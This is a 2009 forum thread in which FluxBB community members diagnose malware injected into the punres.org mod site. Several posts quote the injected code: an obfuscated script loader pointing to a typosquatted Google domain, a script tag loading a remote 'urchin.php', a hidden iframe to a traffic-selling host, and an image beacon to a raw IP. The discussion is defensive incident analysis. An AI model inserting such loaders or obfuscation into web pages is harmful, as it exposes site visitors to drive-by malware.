You are not logged in.
- Topics: Active | Unanswered
Pages: 1
#1 2009-08-07 16:57:57
- joe.banana
- Member
- From: sun
- Registered: 2009-04-25
- Posts: 95
Punres.ORG infected with Malware?
Hello everyone,
Whenever I visit punres.org my AV pops up warning me of malware from this site.
Specifically HEUR/HTML.Malware and then SWF/Drop.Small.WC on Avira..
Anyone else getting troubles from the said site or this is just false alarm?
Offline
#2 2009-08-07 17:48:53
- Reines
- Lead developer

- From: Scotland
- Registered: 2008-05-11
- Posts: 3,163
- Website
Re: Punres.ORG infected with Malware?
I wonder if it's anything to do with the rather weird looking:
<script type="text/javascript"><!--
document.write("<img src='http://208.88.226.75/log.php?id=3&r=" + Math.round(100000 * Math.random()) + "' alt=''/>");
--></script> on each of their pages :s
Though SWF/Drop.Small.WC sounds like something trying to exploit an swf vulnerability, and I don't see anything like that there.
Offline
#3 2009-08-07 17:56:48
- hcgtv
- Member

- From: Charlotte, NC
- Registered: 2008-05-07
- Posts: 419
- Website
Re: Punres.ORG infected with Malware?
avast! has been going crazy on Punres for the last few days, I think it was a malicious ad that was causing the problem.
Bert Garcia - When all you have is a keyboard
Offline
#4 2009-08-07 20:49:43
- Smartys
- Former Developer
- Registered: 2008-04-27
- Posts: 3,135
- Website
Re: Punres.ORG infected with Malware?
Sounds like they got defaced. ![]()
Offline
#5 2009-08-07 22:32:36
- Reines
- Lead developer

- From: Scotland
- Registered: 2008-05-11
- Posts: 3,163
- Website
Re: Punres.ORG infected with Malware?
There's some rather weird code on Punres too which looks like it's trying to do something undesirable.
<script type="text/javascript">
function advQuery(){
var Host="http://google.com/";
alert(unescape("%3Cscript src='"+Host.substr(0,9)+unescape("\u0030\u0030")+Host.substr(9,5)+unescape("%63%6F%6D")+"/if.php' type='text/javascript'%3E%3C/script%3E"));
};advQuery();</script>It basically includes a js script (which seems to be down now) from
http://go00gle.com/if.phpOffline
#6 2009-08-08 16:36:09
- joe.banana
- Member
- From: sun
- Registered: 2009-04-25
- Posts: 95
Re: Punres.ORG infected with Malware?
So nobody is fixing it? It's been like that for almost a week now i think..
Last edited by joe.banana (2009-08-08 16:36:33)
Offline
#7 2009-08-08 16:43:26
Offline
#8 2009-08-08 18:19:54
- Reines
- Lead developer

- From: Scotland
- Registered: 2008-05-11
- Posts: 3,163
- Website
Re: Punres.ORG infected with Malware?
So nobody is fixing it? It's been like that for almost a week now i think..
Punres isn't official and isn't run by us, you'd need to contact the owner of it.
Offline
#9 2009-08-08 18:40:29
- Smartys
- Former Developer
- Registered: 2008-04-27
- Posts: 3,135
- Website
Re: Punres.ORG infected with Malware?
I sent him an email, I don't know if he'll respond/read it.
Offline
#10 2009-08-10 20:35:38
- Smartys
- Former Developer
- Registered: 2008-04-27
- Posts: 3,135
- Website
Re: Punres.ORG infected with Malware?
He has responded and removed the offendending code.
Offline
#11 2009-08-13 17:24:48
- joe.banana
- Member
- From: sun
- Registered: 2009-04-25
- Posts: 95
Offline
#12 2009-08-14 14:25:45
- bgiddins
- Member
- Registered: 2008-08-17
- Posts: 54
Re: Punres.ORG infected with Malware?
Punres is now down...
Offline
#13 2009-08-14 20:03:39
- Kristoffer
- Former Developer
- Registered: 2008-04-29
- Posts: 92
Re: Punres.ORG infected with Malware?
And it probably will be a few days because everything went haywire when I was moving some stuff around. DreamHost is working on it, but I can't do much else.
Offline
#14 2009-09-21 16:31:09
- Koos
- Member

- Registered: 2008-05-09
- Posts: 71
- Website
Re: Punres.ORG infected with Malware?
Who's maintaining punres these days? The Boards Stats module and style previews have not been working for more than a month now. I tried to contact Kristoffer and StevenBullen about this but got no response. Another thing: Why doesn't the fluxbb site make mention of punres anywhere? The mods over there are compatible with fluxbb 1.2 after all.
Offline
#15 2009-09-22 04:38:31
- StevenBullen
- Member
- Registered: 2008-05-03
- Posts: 256
- Website
Re: Punres.ORG infected with Malware?
I will speak to him about getting the Stats/Style part either removed or updated. Probably removed.
Who's maintaining punres these days? The Boards Stats module and style previews have not been working for more than a
month now. I tried to contact Kristoffer and StevenBullen about this but got no response.
No one is maintaining it, if any problems occur then I can chase up Kristoffer.
Why did you not just raise a topic on PunRes as I check it every other day? Plus I just tested my blog contact button and that worked fine, also mailed myself on PunRes and that worked fine. So not sure how your message did not get to me.
Another thing: Why doesn't the fluxbb site make mention of punres anywhere? The mods over there are compatible with fluxbb 1.2 after all.
Compatible, yes. Good Quality, not all of them.
If you check out this particular post it will explain the 'mod repository' situation. ![]()
http://fluxbb.org/forums/post/25385/#p25385
Last edited by StevenBullen (2009-09-22 04:39:01)
Offline
#17 2009-09-30 07:09:56
- StevenBullen
- Member
- Registered: 2008-05-03
- Posts: 256
- Website
Re: Punres.ORG infected with Malware?
Seems like they're still infected - or again.
Any chance of some more information? like are you having the exact same problem as above?
Offline
#18 2009-09-30 09:34:16
- Franz
- Lead developer

- From: Germany
- Registered: 2008-05-13
- Posts: 4,054
- Website
Offline
#19 2009-09-30 14:30:45
- Nickrober
- Member

- Registered: 2009-09-08
- Posts: 7
Re: Punres.ORG infected with Malware?
Here's what happens whenever I visit:

Offline
#20 2009-09-30 21:18:05
- sirena
- Member

- From: AU
- Registered: 2008-05-10
- Posts: 172
Re: Punres.ORG infected with Malware?
Yeah, look at the HTML souce for the punres.org home page:
<script src="http://www.query-google.com/urchin.php" type="text/javascript">
</script>has been inserted just below the legitimate google-analytics.com code block for the site stats.
query-google.com points back to 82.146.52.145 which is hosted in the US but belongs to a Russian company ostensibly from Irkutsk.
That code shouldn't be there on punres.org.
Also note that the punres home page doesn't validate at W3C:
Sorry, I am unable to validate this document because on line 197 it contained one or more bytes that I cannot interpret as utf-8 (in other words, the bytes found are not valid values in the specified Character Encoding). Please check both the content of the file and the character encoding indication.
The error was: utf8 "\xD0" does not map to Unicode
Offline
#21 2009-10-01 06:51:06
- StevenBullen
- Member
- Registered: 2008-05-03
- Posts: 256
- Website
Re: Punres.ORG infected with Malware?
I will inform Jansson. Cheers sirena. ![]()
Offline
#22 2009-10-01 07:49:08
- Reines
- Lead developer

- From: Scotland
- Registered: 2008-05-11
- Posts: 3,163
- Website
Re: Punres.ORG infected with Malware?
If this is the second time it's been infected it sounds like something running isn't up-to-date, or theres at least some underlying problem that needs fixed.
Offline
#23 2009-10-09 00:29:37
- sirena
- Member

- From: AU
- Registered: 2008-05-10
- Posts: 172
Re: Punres.ORG infected with Malware?
The malicious code is still at the bottom of the punres.org home page.
To recap, the problem code is this link at the bottom of the page:
<script src="http://www.query-google.com/urchin.php" type="text/javascript">
</script>That bogus urchin.php page contains the following Javascript code that invisibly writes an iframe:
document.write("<iframe src=\"http://www.step-traff.info/intraf.php?kod=954815&site=www.entervoid.com\" style=display:none></iframe>");the code of which I expect varies from time to time.
Offline
#24 2009-11-15 15:52:30
- Cyclone103
- Member
- From: Antarctica
- Registered: 2008-10-10
- Posts: 46
- Website
Re: Punres.ORG infected with Malware?
My site was similarly infected once. Try placing <!-- before the closing body tag. When the JS injects itself, boom, commented out. It's a temporary fix to be sure, but it works.
Offline
#25 2009-11-15 16:33:16
- Scripter
- Member
- Registered: 2008-05-10
- Posts: 92
- Website
Re: Punres.ORG infected with Malware?
It was fixed today ![]()
Choose a career you love, and you'll never have to work a day in your life.
Offline
Pages: 1
